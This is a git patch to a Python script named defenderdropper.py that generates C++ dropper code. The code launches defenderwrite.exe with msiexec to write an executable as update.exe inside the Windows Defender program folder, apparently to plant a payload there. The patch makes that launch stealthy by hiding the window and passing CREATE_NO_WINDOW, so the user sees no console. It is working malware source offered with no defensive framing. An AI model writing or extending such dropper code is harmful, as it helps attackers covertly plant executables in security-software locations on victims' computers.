From 49fc23364f35629511f4ece25278cb9929ade25e Mon Sep 17 00:00:00 2001 From: abdennour11 Date: Wed, 31 Dec 2025 19:05:41 -0500 Subject: [PATCH] run defenderwrite.exe silently without cmd window --- defenderdropper.py | 16 +++++++++------- 1 file changed, 9 insertions(+), 7 deletions(-) diff --git a/defenderdropper.py b/defenderdropper.py index 453ca73..94d718a 100644 --- a/defenderdropper.py +++ b/defenderdropper.py @@ -209,16 +209,18 @@ def main(): std::string targetPath = "C:\\\\\\\\\\\\\\\\Program Files\\\\\\\\\\\\\\\\Windows Defender\\\\\\\\\\\\\\\\update.exe"; std::string command = "\\"" + defenderWritePath + "\\" C:\\\\\\\\\\\\\\\\Windows\\\\\\\\\\\\\\\\System32\\\\\\\\\\\\\\\\msiexec.exe \\"" + dllPath + "\\" \\"" + targetPath + "\\" c"; - // Execute + // Execute Silently STARTUPINFOA si = {{0}}; PROCESS_INFORMATION pi = {{0}}; si.cb = sizeof(si); - - if (CreateProcessA(NULL, (LPSTR)command.c_str(), NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {{ - WaitForSingleObject(pi.hProcess, 5000); - CloseHandle(pi.hProcess); - CloseHandle(pi.hThread); - }} + si.dwFlags = STARTF_USESHOWWINDOW; + si.wShowWindow = SW_HIDE; + + if (CreateProcessA(NULL, (LPSTR)command.c_str(), NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {{ + WaitForSingleObject(pi.hProcess, 5000); + CloseHandle(pi.hProcess); + CloseHandle(pi.hThread); +}} return 0; }}